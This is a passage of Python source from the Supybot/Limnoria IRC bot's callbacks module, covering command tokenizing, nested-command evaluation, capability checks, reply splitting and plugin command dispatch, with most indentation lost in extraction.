if not isPublic(to):
s = '%s: %s' % (to, s)
if not isPublic(target):
if conf.supybot.reply.withNoticeWhenPrivate():
notice = True
# And now, let's decide whether it's a PRIVMSG or a NOTICE.
msgmaker = ircmsgs.privmsg
if notice:
msgmaker = ircmsgs.notice
# We don't use elif here because actions can't be sent as NOTICEs.
if action:
msgmaker = ircmsgs.action
# Finally, we'll return the actual message.
ret = msgmaker(target, s)
ret.tag('inReplyTo', msg)
return ret
def error(*args, **kwargs):
warnings.warn('callbacks.error is deprecated. Use irc.error instead.',
DeprecationWarning)
return _makeErrorReply(dynamic.irc, *args, **kwargs)
def _makeErrorReply(irc, msg, s, **kwargs):
"""Makes an error reply to msg with the appropriate error payload."""
kwargs['error'] = True
msg.tag('isError')
return _makeReply(irc, msg, s, **kwargs)
def getHelp(method, name=None, doc=None):
if name is None:
name = method.__name__
if doc is None:
if method.__doc__ is None:
doclines = ['This command has no help. Complain to the author.']
else:
doclines = method.__doc__.splitlines()
else:
doclines = doc.splitlines()
s = '%s %s' % (name, doclines.pop(0))
if doclines:
help = ' '.join(doclines)
s = '(%s) -- %s' % (ircutils.bold(s), help)
return utils.str.normalizeWhitespace(s)
def getSyntax(method, name=None, doc=None):
if name is None:
name = method.__name__
if doc is None:
doclines = method.__doc__.splitlines()
else:
doclines = doc.splitlines()
return '%s %s' % (name, doclines[0])
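# Rough sketch of the expected shapes (hypothetical command, an assumption
# rather than documented output): for a method 'echo' whose docstring begins
# with '<text>' followed by 'Returns <text>.', getSyntax() yields
# 'echo <text>' and getHelp() yields something like
# '(echo <text>) -- Returns <text>.' with the syntax part bolded.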
class Error(Exception):
"""Generic class for errors in Privmsg callbacks."""
pass
class ArgumentError(Error):
"""The bot replies with a help message when this is raised."""
pass
class SilentError(Error):
"""An error that we should not notify the user."""
pass
class Tokenizer(object):
    # Escape sequences in tokens are decoded in _handleToken below; this is
    # necessary so that escaped characters are handled properly.
    #
    # These are the base separator characters; the brackets, pipe, and quote
    # characters configured in __init__ are appended to them.
separators = '\x00\r\n \t'
def __init__(self, brackets='', pipe=False, quotes='"'):
if brackets:
self.separators += brackets
self.left = brackets[0]
self.right = brackets[1]
else:
self.left = ''
self.right = ''
self.pipe = pipe
if self.pipe:
self.separators += '|'
self.quotes = quotes
self.separators += quotes
def _handleToken(self, token):
if token[0] == token[-1] and token[0] in self.quotes:
token = token[1:-1]
# FIXME: No need to tell you this is a hack.
# It has to handle both IRC commands and serialized configuration.
#
# Whoever you are, if you make a single modification to this
# code, TEST the code with Python 2 & 3, both with the unit
# tests and on IRC with this: @echo "好"
if minisix.PY2:
try:
token = token.encode('utf8').decode('string_escape')
token = token.decode('utf8')
except:
token = token.decode('string_escape')
else:
token = codecs.getencoder('utf8')(token)[0]
token = codecs.getdecoder('unicode_escape')(token)[0]
try:
token = token.encode('iso-8859-1').decode()
except: # Prevent issue with tokens like '"\\x80"'.
pass
return token
def _insideBrackets(self, lexer):
ret = []
while True:
token = lexer.get_token()
if not token:
raise SyntaxError(_('Missing "%s". You may want to '
'quote your arguments with double '
'quotes in order to prevent extra '
'brackets from being evaluated '
'as nested commands.') % self.right)
elif token == self.right:
return ret
elif token == self.left:
ret.append(self._insideBrackets(lexer))
else:
ret.append(self._handleToken(token))
return ret
def tokenize(self, s):
lexer = shlex.shlex(minisix.io.StringIO(s))
lexer.commenters = ''
lexer.quotes = self.quotes
lexer.separators = self.separators
args = []
ends = []
while True:
token = lexer.get_token()
if not token:
break
elif token == '|' and self.pipe:
# The "and self.pipe" might seem redundant here, but it's there
# for strings like 'foo | bar', where a pipe stands alone as a
# token, but shouldn't be treated specially.
if not args:
raise SyntaxError(_('"|" with nothing preceding. I '
'obviously can\'t do a pipe with '
'nothing before the |.'))
ends.append(args)
args = []
elif token == self.left:
args.append(self._insideBrackets(lexer))
elif token == self.right:
raise SyntaxError(_('Spurious "%s". You may want to '
'quote your arguments with double '
'quotes in order to prevent extra '
'brackets from being evaluated '
'as nested commands.') % self.right)
else:
args.append(self._handleToken(token))
if ends:
if not args:
raise SyntaxError(_('"|" with nothing following. I '
'obviously can\'t do a pipe with '
'nothing after the |.'))
args.append(ends.pop())
while ends:
args[-1].append(ends.pop())
return args
def tokenize(s, channel=None, network=None):
"""A utility function to create a Tokenizer and tokenize a string."""
pipe = False
brackets = ''
nested = conf.supybot.commands.nested
if nested():
brackets = nested.brackets.getSpecific(network, channel)()
if conf.get(nested.pipeSyntax,
channel=channel, network=network): # No nesting, no pipe.
pipe = True
quotes = conf.supybot.commands.quotes.getSpecific(network, channel)()
try:
ret = Tokenizer(brackets=brackets,pipe=pipe,quotes=quotes).tokenize(s)
return ret
except ValueError as e:
raise SyntaxError(str(e))
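# Illustrative tokenization sketch (values assume the default bracket, pipe,
# and quote settings; they are not taken from the original docs):
#
#   Tokenizer(brackets='[]').tokenize('echo [calc 1+1]')
#       # -> ['echo', ['calc', '1+1']]
#   Tokenizer(brackets='[]', pipe=True).tokenize('foo | bar')
#       # -> ['bar', ['foo']]
#
# Bracketed spans become nested argument lists, and piped segments are
# re-nested so that the right-hand command receives the left-hand one last.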
def formatCommand(command):
return ' '.join(command)
def checkCommandCapability(msg, cb, commandName):
plugin = cb.name().lower()
if not isinstance(commandName, minisix.string_types):
assert commandName[0] == plugin, ('checkCommandCapability no longer '
'accepts command names that do not start with the callback\'s '
'name (%s): %s') % (plugin, commandName)
commandName = '.'.join(commandName)
def checkCapability(capability):
assert ircdb.isAntiCapability(capability)
if ircdb.checkCapability(msg.prefix, capability):
log.info('Preventing %s from calling %s because of %s.',
msg.prefix, commandName, capability)
raise RuntimeError(capability)
try:
antiCommand = ircdb.makeAntiCapability(commandName)
checkCapability(antiCommand)
checkAtEnd = [commandName]
default = conf.supybot.capabilities.default()
if msg.channel:
channel = msg.channel
checkCapability(ircdb.makeChannelCapability(channel, antiCommand))
chanCommand = ircdb.makeChannelCapability(channel, commandName)
checkAtEnd += [chanCommand]
default &= ircdb.channels.getChannel(channel).defaultAllow
return not (default or \
any(lambda x: ircdb.checkCapability(msg.prefix, x),
checkAtEnd))
except RuntimeError as e:
s = ircdb.unAntiCapability(str(e))
return s
class RichReplyMethods(object):
"""This is a mixin so these replies need only be defined once. It operates
under several assumptions, including the fact that 'self' is an Irc object
of some sort and there is a self.msg that is an IrcMsg."""
def __makeReply(self, prefix, s):
if s:
s = '%s %s' % (prefix, s)
else:
s = prefix
return ircutils.standardSubstitute(self, self.msg, s)
def _getConfig(self, wrapper):
return conf.get(wrapper,
channel=self.msg.channel, network=self.irc.network)
def replySuccess(self, s='', **kwargs):
v = self._getConfig(conf.supybot.replies.success)
if v:
s = self.__makeReply(v, s)
return self.reply(s, **kwargs)
else:
self.noReply()
def replyError(self, s='', **kwargs):
v = self._getConfig(conf.supybot.replies.error)
if 'msg' in kwargs:
msg = kwargs['msg']
if ircdb.checkCapability(msg.prefix, 'owner'):
v = self._getConfig(conf.supybot.replies.errorOwner)
s = self.__makeReply(v, s)
return self.reply(s, **kwargs)
def _getTarget(self, to=None):
"""Compute the target according to self.to, the provided to,
and self.private, and return it. Mainly used by reply methods."""
# FIXME: Don't set self.to.
# I still set it to be sure I don't introduce a regression,
# but it does not make sense for .reply() and .replies() to
# change the state of this Irc object.
if to is not None:
self.to = self.to or to
target = self.private and self.to or self.msg.args[0]
return target
def replies(self, L, prefixer=None, joiner=None,
onlyPrefixFirst=False,
oneToOne=None, **kwargs):
if prefixer is None:
prefixer = ''
if joiner is None:
joiner = utils.str.commaAndify
if isinstance(prefixer, minisix.string_types):
prefixer = prefixer.__add__
if isinstance(joiner, minisix.string_types):
joiner = joiner.join
to = self._getTarget(kwargs.get('to'))
if oneToOne is None: # Can be True, False, or None
if self.irc.isChannel(to):
oneToOne = conf.get(conf.supybot.reply.oneToOne,
channel=to, network=self.irc.network)
else:
oneToOne = conf.supybot.reply.oneToOne()
if oneToOne:
return self.reply(prefixer(joiner(L)), **kwargs)
else:
msg = None
first = True
for s in L:
if onlyPrefixFirst:
if first:
first = False
msg = self.reply(prefixer(s), **kwargs)
else:
msg = self.reply(s, **kwargs)
else:
msg = self.reply(prefixer(s), **kwargs)
return msg
def noReply(self, msg=None):
self.repliedTo = True
def _error(self, s, Raise=False, **kwargs):
if Raise:
raise Error(s)
else:
return self.error(s, **kwargs)
def errorNoCapability(self, capability, s='', **kwargs):
if 'Raise' not in kwargs:
kwargs['Raise'] = True
log.warning('Denying %s for lacking %q capability.',
self.msg.prefix, capability)
        # noCapability means "don't send a specific capability error
        # message", not "don't send a capability error message at all",
        # as one might think.
if self._getConfig(conf.supybot.reply.error.noCapability) or \
capability in conf.supybot.capabilities.private():
v = self._getConfig(conf.supybot.replies.genericNoCapability)
else:
v = self._getConfig(conf.supybot.replies.noCapability)
try:
v %= capability
except TypeError: # No %s in string
pass
s = self.__makeReply(v, s)
if s:
return self._error(s, **kwargs)
elif kwargs['Raise']:
raise Error()
def errorPossibleBug(self, s='', **kwargs):
v = self._getConfig(conf.supybot.replies.possibleBug)
if s:
s += ' (%s)' % v
else:
s = v
return self._error(s, **kwargs)
def errorNotRegistered(self, s='', **kwargs):
v = self._getConfig(conf.supybot.replies.notRegistered)
return self._error(self.__makeReply(v, s), **kwargs)
def errorNoUser(self, s='', name='that user', **kwargs):
if 'Raise' not in kwargs:
kwargs['Raise'] = True
v = self._getConfig(conf.supybot.replies.noUser)
try:
v = v % name
except TypeError:
log.warning('supybot.replies.noUser should have one "%s" in it.')
return self._error(self.__makeReply(v, s), **kwargs)
def errorRequiresPrivacy(self, s='', **kwargs):
v = self._getConfig(conf.supybot.replies.requiresPrivacy)
return self._error(self.__makeReply(v, s), **kwargs)
def errorInvalid(self, what, given=None, s='', repr=True, **kwargs):
if given is not None:
if repr:
given = _repr(given)
else:
given = '"%s"' % given
v = _('%s is not a valid %s.') % (given, what)
else:
v = _('That\'s not a valid %s.') % what
if 'Raise' not in kwargs:
kwargs['Raise'] = True
if s:
v += ' ' + s
return self._error(v, **kwargs)
_repr = repr
class ReplyIrcProxy(RichReplyMethods):
"""This class is a thin wrapper around an irclib.Irc object that gives it
the reply() and error() methods (as well as everything in RichReplyMethods,
based on those two)."""
def __init__(self, irc, msg):
self.irc = irc
self.msg = msg
self.getRealIrc()._setMsgChannel(self.msg)
def getRealIrc(self):
"""Returns the real irclib.Irc object underlying this proxy chain."""
if isinstance(self.irc, irclib.Irc):
return self.irc
else:
return self.irc.getRealIrc()
# This should make us be considered equal to our irclib.Irc object for
# hashing; an important thing (no more "too many open files" exceptions :))
def __hash__(self):
return hash(self.getRealIrc())
def __eq__(self, other):
return self.getRealIrc() == other
__req__ = __eq__
def __ne__(self, other):
return not (self == other)
__rne__ = __ne__
def error(self, s, msg=None, **kwargs):
if 'Raise' in kwargs and kwargs['Raise']:
raise Error()
if msg is None:
msg = self.msg
if s:
m = _makeErrorReply(self, msg, s, **kwargs)
self.irc.queueMsg(m)
return m
def reply(self, s, msg=None, **kwargs):
if msg is None:
msg = self.msg
assert not isinstance(s, ircmsgs.IrcMsg), \
'Old code alert: there is no longer a "msg" argument to reply.'
kwargs.pop('noLengthCheck', None)
m = _makeReply(self, msg, s, **kwargs)
self.irc.queueMsg(m)
return m
def __getattr__(self, attr):
return getattr(self.irc, attr)
SimpleProxy = ReplyIrcProxy # Backwards-compatibility
class NestedCommandsIrcProxy(ReplyIrcProxy):
"A proxy object to allow proper nesting of commands (even threaded ones)."
_mores = ircutils.IrcDict()
def __init__(self, irc, msg, args, nested=0):
assert isinstance(args, list), 'Args should be a list, not a string.'
super(NestedCommandsIrcProxy, self).__init__(irc, msg)
self.nested = nested
self.repliedTo = False
if not self.nested and isinstance(irc, self.__class__):
# This means we were given an NestedCommandsIrcProxy instead of an
# irclib.Irc, and so we're obviously nested. But nested wasn't
# set! So we take our given Irc's nested value.
self.nested += irc.nested
maxNesting = conf.supybot.commands.nested.maximum()
if maxNesting and self.nested > maxNesting:
log.warning('%s attempted more than %s levels of nesting.',
self.msg.prefix, maxNesting)
self.error(_('You\'ve attempted more nesting than is '
'currently allowed on this bot.'))
return
# The deepcopy here is necessary for Scheduler; it re-runs already
# tokenized commands. There's a possibility a simple copy[:] would
# work, but we're being careful.
self.args = copy.deepcopy(args)
self.counter = 0
self._resetReplyAttributes()
if not args:
self.finalEvaled = True
self._callInvalidCommands()
else:
self.finalEvaled = False
world.commandsProcessed += 1
self.evalArgs()
def __eq__(self, other):
return other == self.getRealIrc()
def __hash__(self):
return hash(self.getRealIrc())
def _resetReplyAttributes(self):
self.to = None
self.action = None
self.notice = None
self.private = None
self.noLengthCheck = None
if self.msg.channel:
self.prefixNick = conf.get(conf.supybot.reply.withNickPrefix,
channel=self.msg.channel, network=self.irc.network)
else:
self.prefixNick = conf.supybot.reply.withNickPrefix()
def evalArgs(self, withClass=None):
while self.counter < len(self.args):
self.repliedTo = False
if isinstance(self.args[self.counter], minisix.string_types):
# If it's a string, just go to the next arg. There is no
# evaluation to be done for strings. If, at some point,
# we decided to, say, convert every string using
# ircutils.standardSubstitute, this would be where we would
# probably put it.
self.counter += 1
else:
assert isinstance(self.args[self.counter], list)
# It's a list. So we spawn another NestedCommandsIrcProxy
# to evaluate its args. When that class has finished
# evaluating its args, it will call our reply method, which
# will subsequently call this function again, and we'll
# pick up where we left off via self.counter.
cls = withClass or self.__class__
cls(self, self.msg, self.args[self.counter],
nested=self.nested+1)
# We have to return here because the new NestedCommandsIrcProxy
# might not have called our reply method instantly, since
# its command might be threaded. So (obviously) we can't
# just fall through to self.finalEval.
return
# Once all the list args are evaluated, we then evaluate our own
# list of args, since we're assured that they're all strings now.
assert all(lambda x: isinstance(x, minisix.string_types), self.args)
self.finalEval()
def _callInvalidCommands(self):
log.debug('Calling invalidCommands.')
threaded = False
cbs = []
for cb in self.irc.callbacks:
if hasattr(cb, 'invalidCommand'):
cbs.append(cb)
threaded = threaded or cb.threaded
def callInvalidCommands():
self.repliedTo = False
for cb in cbs:
log.debug('Calling %s.invalidCommand.', cb.name())
try:
cb.invalidCommand(self, self.msg, self.args)
except Error as e:
self.error(str(e))
except Exception as e:
log.exception('Uncaught exception in %s.invalidCommand.',
cb.name())
log.debug('Finished calling %s.invalidCommand.', cb.name())
if self.repliedTo:
log.debug('Done calling invalidCommands: %s.',cb.name())
return
if threaded:
name = 'Thread #%s (for invalidCommands)' % world.threadsSpawned
t = world.SupyThread(target=callInvalidCommands, name=name)
t.setDaemon(True)
t.start()
else:
callInvalidCommands()
def findCallbacksForArgs(self, args):
"""Returns a two-tuple of (command, plugins) that has the command
(a list of strings) and the plugins for which it was a command."""
assert isinstance(args, list)
args = list(map(canonicalName, args))
cbs = []
maxL = []
for cb in self.irc.callbacks:
if not hasattr(cb, 'getCommand'):
continue
L = cb.getCommand(args)
#log.debug('%s.getCommand(%r) returned %r', cb.name(), args, L)
if L and L >= maxL:
maxL = L
cbs.append((cb, L))
assert isinstance(L, list), \
'getCommand now returns a list, not a method.'
assert utils.iter.startswith(L, args), \
'getCommand must return a prefix of the args given. ' \
'(args given: %r, returned: %r)' % (args, L)
log.debug('findCallbacksForArgs: %r', cbs)
cbs = [cb for (cb, L) in cbs if L == maxL]
if len(maxL) == 1:
# Special case: one arg determines the callback. In this case, we
# have to check, in order:
# 1. Whether the arg is the same as the name of a callback. This
# callback would then win.
for cb in cbs:
if cb.canonicalName() == maxL[0]:
return (maxL, [cb])
# 2. Whether a defaultplugin is defined.
defaultPlugins = conf.supybot.commands.defaultPlugins
try:
defaultPlugin = defaultPlugins.get(maxL[0])()
log.debug('defaultPlugin: %r', defaultPlugin)
if defaultPlugin:
cb = self.irc.getCallback(defaultPlugin)
if cb in cbs:
# This is just a sanity check, but there's a small
# possibility that a default plugin for a command
# is configured to point to a plugin that doesn't
# actually have that command.
return (maxL, [cb])
except registry.NonExistentRegistryEntry:
pass
# 3. Whether an importantPlugin is one of the responses.
important = defaultPlugins.importantPlugins()
important = list(map(canonicalName, important))
importants = []
for cb in cbs:
if cb.canonicalName() in important:
importants.append(cb)
if len(importants) == 1:
return (maxL, importants)
return (maxL, cbs)
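    # Dispatch sketch with hypothetical names (an assumption, not original
    # documentation): given args ['plugin', 'foo', 'bar'], a callback whose
    # getCommand() returns ['plugin', 'foo', 'bar'] beats one returning just
    # ['foo'], since the longest matching prefix is treated as the most
    # specific command; remaining ties are broken by defaultPlugins /
    # importantPlugins, or reported back to the user as ambiguous.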
def finalEval(self):
        # Now that we've already iterated through our args and made sure
        # that any list of args was evaluated (by spawning another
        # NestedCommandsIrcProxy to evaluate it into a string), we can
        # finally evaluate our own list of arguments.
assert not self.finalEvaled, 'finalEval called twice.'
self.finalEvaled = True
        # Now, the way we call a command is we iterate over the loaded plugins,
        # asking each one if the list of args we have interests it. The
        # way we do that is by calling getCommand on the plugin.
        # The plugin will return a list of args which it considers to be
        # "interesting." We will then give our args to the plugin which
        # has the *longest* list. The reason we pick the longest list is
        # that it seems reasonable that the longer the list, the more
        # specific the command is. That is, given a list of length X, a list
        # of length X+1 would be even more specific (assuming that both lists
        # used the same prefix). Of course, if two plugins return a list of
        # the same length, we'll just error out with a message about ambiguity.
(command, cbs) = self.findCallbacksForArgs(self.args)
if not cbs:
# We used to handle addressedRegexps here, but I think we'll let
# them handle themselves in getCommand. They can always just
# return the full list of args as their "command".
self._callInvalidCommands()
elif len(cbs) > 1:
names = sorted([cb.name() for cb in cbs])
command = formatCommand(command)
self.error(format(_('The command %q is available in the %L '
'plugins. Please specify the plugin '
'whose command you wish to call by using '
'its name as a command before %q.'),
command, names, command))
else:
cb = cbs[0]
args = self.args[len(command):]
if world.isMainThread() and \
(cb.threaded or conf.supybot.debug.threadAllCommands()):
t = CommandThread(target=cb._callCommand,
args=(command, self, self.msg, args))
t.start()
else:
cb._callCommand(command, self, self.msg, args)
def reply(self, s, noLengthCheck=False, prefixNick=None, action=None,
private=None, notice=None, to=None, msg=None,
sendImmediately=False, stripCtcp=True):
"""
Keyword arguments:
* `noLengthCheck=False`: True if the length shouldn't be checked
(used for 'more' handling)
* `prefixNick=True`: False if the nick shouldn't be prefixed to the
reply.
* `action=False`: True if the reply should be an action.
* `private=False`: True if the reply should be in private.
* `notice=False`: True if the reply should be noticed when the
bot is configured to do so.
* `to=<nick|channel>`: The nick or channel the reply should go to.
Defaults to msg.args[0] (or msg.nick if private)
* `sendImmediately=False`: True if the reply should use sendMsg() which
bypasses conf.supybot.protocols.irc.throttleTime
and gets sent before any queued messages
"""
# These use and or or based on whether or not they default to True or
# False. Those that default to True use and; those that default to
# False use or.
assert not isinstance(s, ircmsgs.IrcMsg), \
'Old code alert: there is no longer a "msg" argument to reply.'
self.repliedTo = True
if sendImmediately:
sendMsg = self.irc.sendMsg
else:
sendMsg = self.irc.queueMsg
if msg is None:
msg = self.msg
if prefixNick is not None:
self.prefixNick = prefixNick
if action is not None:
self.action = self.action or action
if action:
self.prefixNick = False
if notice is not None:
self.notice = self.notice or notice
if private is not None:
self.private = self.private or private
target = self._getTarget(to)
# action=True implies noLengthCheck=True and prefixNick=False
        self.noLengthCheck = noLengthCheck or self.noLengthCheck or self.action
if not isinstance(s, minisix.string_types): # avoid trying to str() unicode
s = str(s) # Allow non-string esses.
if self.finalEvaled:
try:
if isinstance(self.irc, self.__class__):
s = s[:conf.supybot.reply.maximumLength()]
return self.irc.reply(s, to=self.to,
notice=self.notice,
action=self.action,
private=self.private,
prefixNick=self.prefixNick,
noLengthCheck=self.noLengthCheck,
stripCtcp=stripCtcp)
elif self.noLengthCheck:
# noLengthCheck only matters to NestedCommandsIrcProxy, so
# it's not used here. Just in case you were wondering.
m = _makeReply(self, msg, s, to=self.to,
notice=self.notice,
action=self.action,
private=self.private,
prefixNick=self.prefixNick,
stripCtcp=stripCtcp)
sendMsg(m)
return m
else:
s = ircutils.safeArgument(s)
allowedLength = conf.get(conf.supybot.reply.mores.length,
channel=target, network=self.irc.network)
if not allowedLength: # 0 indicates this.
allowedLength = (512
- len(':') - len(self.irc.prefix)
- len(' PRIVMSG ')
- len(target)
- len(' :')
- len('\r\n')
)
if self.prefixNick:
allowedLength -= len(msg.nick) + len(': ')
maximumMores = conf.get(conf.supybot.reply.mores.maximum,
channel=target, network=self.irc.network)
maximumLength = allowedLength * maximumMores
if len(s) > maximumLength:
log.warning('Truncating to %s bytes from %s bytes.',
maximumLength, len(s))
s = s[:maximumLength]
s_size = len(s.encode()) if minisix.PY3 else len(s)
if s_size <= allowedLength or \
not conf.get(conf.supybot.reply.mores,
channel=target, network=self.irc.network):
# There's no need for action=self.action here because
# action implies noLengthCheck, which has already been
# handled. Let's stick an assert in here just in case.
assert not self.action
m = _makeReply(self, msg, s, to=self.to,
notice=self.notice,
private=self.private,
prefixNick=self.prefixNick,
stripCtcp=stripCtcp)
sendMsg(m)
return m
                    # The '(XX more messages)' text may not have the same
                    # length in the current locale
allowedLength -= len(_('(XX more messages)')) + 1 # bold
msgs = ircutils.wrap(s, allowedLength)
msgs.reverse()
instant = conf.get(conf.supybot.reply.mores.instant,
channel=target, network=self.irc.network)
while instant > 1 and msgs:
instant -= 1
response = msgs.pop()
m = _makeReply(self, msg, response, to=self.to,
notice=self.notice,
private=self.private,
prefixNick=self.prefixNick,
stripCtcp=stripCtcp)
sendMsg(m)
# XXX We should somehow allow these to be returned, but
# until someone complains, we'll be fine :) We
# can't return from here, though, for obvious
# reasons.
# return m
if not msgs:
return
response = msgs.pop()
if msgs:
if len(msgs) == 1:
more = _('more message')
else:
more = _('more messages')
n = ircutils.bold('(%i %s)' % (len(msgs), more))
response = '%s %s' % (response, n)
prefix = msg.prefix
if self.to and ircutils.isNick(self.to):
try:
state = self.getRealIrc().state
prefix = state.nickToHostmask(self.to)
except KeyError:
pass # We'll leave it as it is.
mask = prefix.split('!', 1)[1]
self._mores[mask] = msgs
public = bool(self.msg.channel)
private = self.private or not public
self._mores[msg.nick] = (private, msgs)
m = _makeReply(self, msg, response, to=self.to,
action=self.action,
notice=self.notice,
private=self.private,
prefixNick=self.prefixNick,
stripCtcp=stripCtcp)
sendMsg(m)
return m
finally:
self._resetReplyAttributes()
else:
if msg.ignored:
# Since the final reply string is constructed via
# ' '.join(self.args), the args index for ignored commands
# needs to be popped to avoid extra spaces in the final reply.
self.args.pop(self.counter)
msg.tag('ignored', False)
else:
self.args[self.counter] = s
self.evalArgs()
def noReply(self, msg=None):
if msg is None:
msg = self.msg
super(NestedCommandsIrcProxy, self).noReply(msg=msg)
if self.finalEvaled:
if isinstance(self.irc, NestedCommandsIrcProxy):
self.irc.noReply(msg=msg)
else:
msg.tag('ignored', True)
else:
self.args.pop(self.counter)
msg.tag('ignored', False)
self.evalArgs()
def replies(self, L, prefixer=None, joiner=None,
onlyPrefixFirst=False, to=None,
oneToOne=None, **kwargs):
if not self.finalEvaled and oneToOne is None:
oneToOne = True
return super(NestedCommandsIrcProxy, self).replies(L,
prefixer=prefixer, joiner=joiner,
onlyPrefixFirst=onlyPrefixFirst, to=to,
oneToOne=oneToOne, **kwargs)
def error(self, s='', Raise=False, **kwargs):
self.repliedTo = True
if Raise:
raise Error(s)
if not isinstance(self.irc, irclib.Irc):
return self.irc.error(s, **kwargs)
elif s:
m = _makeErrorReply(self, self.msg, s, **kwargs)
self.irc.queueMsg(m)
return m
def __getattr__(self, attr):
return getattr(self.irc, attr)
IrcObjectProxy = NestedCommandsIrcProxy
class CommandThread(world.SupyThread):
"""Just does some extra logging and error-recovery for commands that need
to run in threads.
"""
def __init__(self, target=None, args=(), kwargs={}):
self.command = args[0]
self.cb = target.__self__
threadName = 'Thread #%s (for %s.%s)' % (world.threadsSpawned,
self.cb.name(),
self.command)
log.debug('Spawning thread %s (args: %r)', threadName, args)
self.__parent = super(CommandThread, self)
self.__parent.__init__(target=target, name=threadName,
args=args, kwargs=kwargs)
self.setDaemon(True)
self.originalThreaded = self.cb.threaded
self.cb.threaded = True
def run(self):
try:
self.__parent.run()
finally:
self.cb.threaded = self.originalThreaded
class CommandProcess(world.SupyProcess):
"""Just does some extra logging and error-recovery for commands that need
to run in processes.
"""
def __init__(self, target=None, args=(), kwargs={}):
pn = kwargs.pop('pn', 'Unknown')
cn = kwargs.pop('cn', 'unknown')
procName = 'Process #%s (for %s.%s)' % (world.processesSpawned,
pn,
cn)
log.debug('Spawning process %s (args: %r)', procName, args)
self.__parent = super(CommandProcess, self)
self.__parent.__init__(target=target, name=procName,
args=args, kwargs=kwargs)
def run(self):
self.__parent.run()
class CanonicalString(registry.NormalizedString):
def normalize(self, s):
return canonicalName(s)
class CanonicalNameSet(utils.NormalizingSet):
def normalize(self, s):
return canonicalName(s)
class CanonicalNameDict(utils.InsensitivePreservingDict):
def key(self, s):
return canonicalName(s)
class Disabled(registry.SpaceSeparatedListOf):
sorted = True
Value = CanonicalString
List = CanonicalNameSet
conf.registerGlobalValue(conf.supybot.commands, 'disabled',
Disabled([], _("""Determines what commands are currently disabled. Such
commands will not appear in command lists, etc. They will appear not even
to exist.""")))
class DisabledCommands(object):
def __init__(self):
self.d = CanonicalNameDict()
for name in conf.supybot.commands.disabled():
if '.' in name:
(plugin, command) = name.split('.', 1)
if command in self.d:
if self.d[command] is not None:
self.d[command].add(plugin)
else:
self.d[command] = CanonicalNameSet([plugin])
else:
self.d[name] = None
def disabled(self, command, plugin=None):
if command in self.d:
if self.d[command] is None:
return True
elif plugin in self.d[command]:
return True
return False
def add(self, command, plugin=None):
if plugin is None:
self.d[command] = None
else:
if command in self.d:
if self.d[command] is not None:
self.d[command].add(plugin)
else:
self.d[command] = CanonicalNameSet([plugin])
def remove(self, command, plugin=None):
if plugin is None:
del self.d[command]
else:
if self.d[command] is not None:
self.d[command].remove(plugin)
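# Usage sketch (assumed names): supybot.commands.disabled holds entries such
# as 'list' (disable the command everywhere) or 'Misc.list' (disable it only
# in the Misc plugin), and DisabledCommands answers queries against that
# registry value:
#
#   d = DisabledCommands()
#   d.disabled('list')          # True if disabled globally
#   d.disabled('list', 'Misc')  # True if disabled for the Misc plugin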
class BasePlugin(object):
def __init__(self, *args, **kwargs):
self.cbs = []
for attr in dir(self):
if attr != canonicalName(attr):
continue
obj = getattr(self, attr)
if isinstance(obj, type) and issubclass(obj, BasePlugin):
cb = obj(*args, **kwargs)
setattr(self, attr, cb)
self.cbs.append(cb)
cb.log = log.getPluginLogger('%s.%s' % (self.name(),cb.name()))
super(BasePlugin, self).__init__()
class MetaSynchronizedAndFirewalled(log.MetaFirewall, utils.python.MetaSynchronized):
pass
SynchronizedAndFirewalled = MetaSynchronizedAndFirewalled(
'SynchronizedAndFirewalled', (), {})
class Commands(BasePlugin, SynchronizedAndFirewalled):
__synchronized__ = (
'__call__',
'callCommand',
'invalidCommand',
)
# For a while, a comment stood here to say, "Eventually callCommand." But
# that's wrong, because we can't do generic error handling in this
# callCommand -- plugins need to be able to override callCommand and do
# error handling there (see the Web plugin for an example).
__firewalled__ = {'isCommand': None,
'_callCommand': None}
commandArgs = ['self', 'irc', 'msg', 'args']
# These must be class-scope, so all plugins use the same one.
_disabled = DisabledCommands()
pre_command_callbacks = []
def name(self):
return self.__class__.__name__
def canonicalName(self):
return canonicalName(self.name())
def isDisabled(self, command):
return self._disabled.disabled(command, self.name())
def isCommandMethod(self, name):
"""Returns whether a given method name is a command in this plugin."""
# This function is ugly, but I don't want users to call methods like
# doPrivmsg or __init__ or whatever, and this is good to stop them.
# Don't normalize this name: consider outFilter(self, irc, msg).
# name = canonicalName(name)
if self.isDisabled(name):
return False
if name != canonicalName(name):
return False
if hasattr(self, name):
method = getattr(self, name)
if inspect.ismethod(method):
code = method.__func__.__code__
return inspect.getargs(code)[0] == self.commandArgs
else:
return False
else:
return False
def isCommand(self, command):
"""Convenience, backwards-compatibility, semi-deprecated."""
if isinstance(command, minisix.string_types):
return self.isCommandMethod(command)
else:
# Since we're doing a little type dispatching here, let's not be
# too liberal.
assert isinstance(command, list)
return self.getCommand(command) == command
def getCommand(self, args, stripOwnName=True):
assert args == list(map(canonicalName, args))
first = args[0]
for cb in self.cbs:
if first == cb.canonicalName():
return cb.getCommand(args)
if first == self.canonicalName() and len(args) > 1 and \
stripOwnName:
ret = self.getCommand(args[1:], stripOwnName=False)
if ret:
return [first] + ret
if self.isCommandMethod(first):
return [first]
return []
def getCommandMethod(self, command):
"""Gets the given command from this plugin."""
#print '*** %s.getCommandMethod(%r)' % (self.name(), command)
assert not isinstance(command, minisix.string_types)
assert command == list(map(canonicalName, command))
assert self.getCommand(command) == command
for cb in self.cbs:
if command[0] == cb.canonicalName():
return cb.getCommandMethod(command)
if len(command) > 1:
assert command[0] == self.canonicalName()
return self.getCommandMethod(command[1:])
else:
method = getattr(self, command[0])
if inspect.ismethod(method):
code = method.__func__.__code__
if inspect.getargs(code)[0] == self.commandArgs:
return method
else:
raise AttributeError
def listCommands(self, pluginCommands=[]):
commands = set(pluginCommands)
for s in dir(self):
if self.isCommandMethod(s):
commands.add(s)
for cb in self.cbs:
name = cb.canonicalName()
for command in cb.listCommands():
if command == name:
commands.add(command)
else:
commands.add(' '.join([name, command]))
L = list(commands)
L.sort()
return L
def callCommand(self, command, irc, msg, *args, **kwargs):
# We run all callbacks before checking if one of them returned True
if any(bool, list(cb(self, command, irc, msg, *args, **kwargs)
for cb in self.pre_command_callbacks)):
return
method = self.getCommandMethod(command)
method(irc, msg, *args, **kwargs)
def _callCommand(self, command, irc, msg, *args, **kwargs):
if irc.nick == msg.args[0]:
self.log.info('%s called in private by %q.', formatCommand(command),
msg.prefix)
else:
self.log.info('%s called on %s by %q.', formatCommand(command),
msg.args[0], msg.prefix)
try:
if len(command) == 1 or command[0] != self.canonicalName():
fullCommandName = [self.canonicalName()] + command
else:
fullCommandName = command
